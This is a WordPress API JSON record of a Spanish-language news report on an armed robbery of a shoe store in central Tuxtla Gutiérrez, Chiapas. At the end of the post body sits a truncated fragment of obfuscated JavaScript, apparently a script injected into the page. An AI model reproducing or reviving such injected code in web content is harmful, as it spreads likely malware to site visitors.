{"id":21079,"date":"2025-03-26T03:25:30","date_gmt":"2025-03-26T03:25:30","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=21079"},"modified":"2025-03-26T03:25:31","modified_gmt":"2025-03-26T03:25:31","slug":"asaltan-zapateria-en-el-centro-de-tuxtla","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=21079","title":{"rendered":"Asaltan zapater\u00eda en el centro de Tuxtla"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"771\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250325-WA0063-1024x771.jpg\" alt=\"\" class=\"wp-image-21080\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250325-WA0063-1024x771.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250325-WA0063-300x226.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250325-WA0063-768x578.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250325-WA0063-1536x1156.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250325-WA0063.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 25 de marzo del 2025. Tuxtla Guti\u00e9rrez.- Este viernes por la tarde noche un delincuente armado asalt\u00f3 la zapater\u00eda Ana\u00eds ubicada en la 5a Sur y 5a Oriente en el centro de Tuxtla.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, el sujeto ingreso cerca de las 6 de la tarde como cliente y solicit\u00f3 le mostraran unos zapatos.<\/p>\n\n\n\n<p>El sujeto que vest\u00eda playera negra, pantal\u00f3n de mezclilla azul y tenis azules de 1.65 de estatura sac\u00f3 un arma de fuego y amag\u00f3 a la cajera.<\/p>\n\n\n\n<p>El delincuente se apoder\u00f3 de 5 mil pesos en efectivo y unos tenis con valor de 600 pesos.<\/p>\n\n\n\n<p>Posteriormente escap\u00f3 rumbo a la zona Poniente de la ciudad.<\/p>\n\n\n\n<p>Al lugar arribaron elementos de diferentes corporaciones para montar un operativo de b\u00fasqueda sin obtener resultados positivos.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 25 de marzo del 2025. Tuxtla Guti\u00e9rrez.- Este viernes por la tarde noche un delincuente armado asalt\u00f3 la zapater\u00eda Ana\u00eds ubicada en la 5a Sur y 5a Oriente en el centro de Tuxtla. Los reportes oficiales informaron que, el sujeto ingreso cerca de las 6 de la tarde como cliente y &hellip;<\/p>\n","protected":false},"author":2,"featured_media":21080,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-21079","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21079","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=21079"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21079\/revisions"}],"predecessor-version":[{"id":21081,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21079\/revisions\/21081"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/21080"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=21079"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=21079"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=21079"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}